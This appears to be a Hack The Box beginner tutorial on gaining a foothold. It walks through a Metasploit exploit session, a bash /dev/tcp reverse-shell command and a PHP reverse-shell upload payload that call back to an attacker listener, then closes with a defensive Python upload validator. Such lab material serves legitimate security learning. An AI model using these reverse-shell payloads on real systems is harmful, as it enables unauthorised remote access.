Getting into Hack The Box can be difficult. Let's make it a little bit easier.
Since you collected service versions during the reconnaissance phase, take advantage of them: Google the exact version of every service you found and see whether any known vulnerabilities exist. If you’re lucky, there’s a Metasploit module that you can use.
There’s a nice SANS cheatsheet to help you use Metasploit.
Here’s an example exploit session to put the cheatsheet into perspective.
msf5 > search example
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/http/example_file_upload 2015-09-15 excellent Yes Examlple File Upload Vulnerability
msf5 > use 0
msf5 exploit(multi/http/example_file_upload) > options
Module options (exploit/multi/http/example_file_upload):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path to the web application
VHOST no HTTP server virtual host
Exploit target:
Id Name
-- ----
0 Example 3.1.1
msf5 exploit(multi/http/example_file_upload) > set RHOSTS 10.10.10.10
RHOSTS => 10.10.10.10
msf5 exploit(multi/http/example_file_upload) > set TARGETURI /example/
TARGETURI => /example/
msf5 exploit(multi/http/example_file_upload) > run
[*] Started reverse TCP handler on 10.10.15.1:4444
[*] Sending stage (37543 bytes) to 10.10.10.10
[*] Meterpreter session 1 opened (10.10.15.1:4444 -> 10.10.10.10:56052) at 2020-07-11 20:51:40 -0500
[+] Deleted payload.php
meterpreter > shell
Process 3816 created.
Channel 0 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
If you find a vulnerability on a service, but there isn’t a Metasploit module available, you might be able to find a proof of concept (PoC) script on GitHub or Exploit-DB.
More often than not, a PoC script will only give you the ability to send commands to run, which can be slow and cumbersome to use.
The solution to this is setting up a reverse shell.
Utilizing a reverse shell is a three-step process: start a listener on your machine, have the target run a command that connects back to it, and then interact with the shell that arrives on the listener.
Command Breakdown:
nc: TCP/IP swiss army knife, used to read and write data across network connections
-n: No DNS
-v: Verbose
-l: Listen for inbound connections
-p 4444: Local port to open for connections
user@parrot:~$ nc -nvlp 4444
listening on [any] 4444 ...
user@parrot:~$ python3 50180 http://10.10.10.10/example -c "bash -i >& /dev/tcp/10.10.15.1/4444 0>&1"
Example 2.3 - Remote Command Execution
[+] Uploading malicious .zip file: ✓
[+] Executing bash -i >& /dev/tcp/10.10.15.1/4444 0>&1: ✓
[+] Keep breaking ev3rYthiNg!!
user@parrot:~$ nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.10.10.10] from (UNKNOWN) [10.10.15.1] 33280
www-data@example:/var/www/html$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
If there isn’t a common vulnerability to exploit, then you might want to look for a place to upload files. If you do find a place to upload files, then you should try uploading a PHP reverse shell.
payload.php:
<?php
exec("/bin/bash -c 'bash -i > /dev/tcp/10.10.15.1/4444 0>&1'");
?>
Once you’ve uploaded the reverse shell, you can create a netcat listener and trigger the payload.
user@parrot:~$ nc -nvlp 4444
listening on [any] 4444 ...
Then curl it to trigger the reverse shell.
user@parrot:~$ curl http://10.10.10.10/upload/payload.php
user@parrot:~$ nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.10.10.10] from (UNKNOWN) [10.10.15.1] 45812
www-data@example:/var/www/html$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
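The upload trick above only works because the application accepts a .php file and serves it back from a path the web server will execute. As an added example from the defender's side (Python, not the page's PHP and not code from any particular application), here is the validation a hardened upload handler performs: a single allow-listed extension, magic bytes that match the declared type, a size limit, a scan for embedded code markers, and a random storage name instead of the client-supplied one. The function names, the sample files and the allow-list are this example's own assumptions.

```python
import os
import re
import secrets

# Allowed extensions and the magic bytes a file of that type must start with.
ALLOWED_TYPES = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
    "pdf": b"%PDF-",
}

# Server-side code markers that have no business inside an image or document.
CODE_MARKERS = re.compile(rb"<\?(?:php|=)|<%|<script", re.IGNORECASE)

MAX_SIZE = 2 * 1024 * 1024  # 2 MiB


def validate_upload(filename: str, content: bytes):
    """Return (ok, reason); ok is True only when every check passes."""
    base = os.path.basename(filename)
    if not base or base != filename:
        return False, "path components in filename"
    parts = base.lower().split(".")
    # Exactly one extension: rejects "payload", ".htaccess" style names and "shell.php.png".
    if len(parts) != 2 or not parts[0]:
        return False, "exactly one extension required"
    ext = parts[1]
    if ext not in ALLOWED_TYPES:
        return False, f"extension .{ext} not allowed"
    if len(content) > MAX_SIZE:
        return False, "file too large"
    if not content.startswith(ALLOWED_TYPES[ext]):
        return False, "content does not match declared type"
    if CODE_MARKERS.search(content):
        return False, "embedded code marker"
    return True, "ok"


def storage_name(filename: str) -> str:
    """Random on-disk name keeping only the validated extension, so the client's name is never used."""
    ext = filename.rsplit(".", 1)[1].lower()
    return f"{secrets.token_hex(16)}.{ext}"


# Constructed samples: the page's payload.php body, and a minimal PNG header padded with zeros.
PHP_PAYLOAD = b"<?php\nexec(\"/bin/bash -c 'bash -i > /dev/tcp/10.10.15.1/4444 0>&1'\");\n?>\n"
PNG_IMAGE = b"\x89PNG\r\n\x1a\n" + b"\x00" * 64

if __name__ == "__main__":
    for name, data in [("payload.php", PHP_PAYLOAD), ("shell.php.png", PHP_PAYLOAD),
                       ("cat.png", PHP_PAYLOAD), ("cat.png", PNG_IMAGE)]:
        ok, reason = validate_upload(name, data)
        print(f"{name:15} -> {'accept' if ok else 'reject'} ({reason})")
        if ok:
            print(f"    stored as {storage_name(name)}")
```

Accepted files should be written to a directory outside the document root (or one the web server is configured never to execute scripts from) and served through a handler that sets the content type itself; the random storage name means the attacker never learns a URL that maps to their original filename.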